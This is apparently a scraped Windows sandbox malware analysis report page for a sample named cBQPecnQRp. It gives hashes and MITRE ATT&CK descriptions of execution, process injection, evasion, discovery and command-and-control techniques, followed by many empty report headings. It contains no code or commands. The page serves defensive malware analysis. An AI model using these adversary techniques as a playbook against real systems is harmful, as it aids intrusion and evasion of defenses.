Instruction ID: d5b6f2ed76693bfd4dde1bd8df5f54791784d12e65b75794ef5db368716d55f3
Opcode Fuzzy Hash: a3f89645ad186ef37d4deb753c4a08efe29723a85833ca61b8c620248b62cbd3
Instruction Fuzzy Hash: 2FF0B4B2A0861257E72437BE7C0CAAB2976FFC0751711463AF60AC6350DE2CCC018759

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report cBQPecnQRp

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Code Manipulations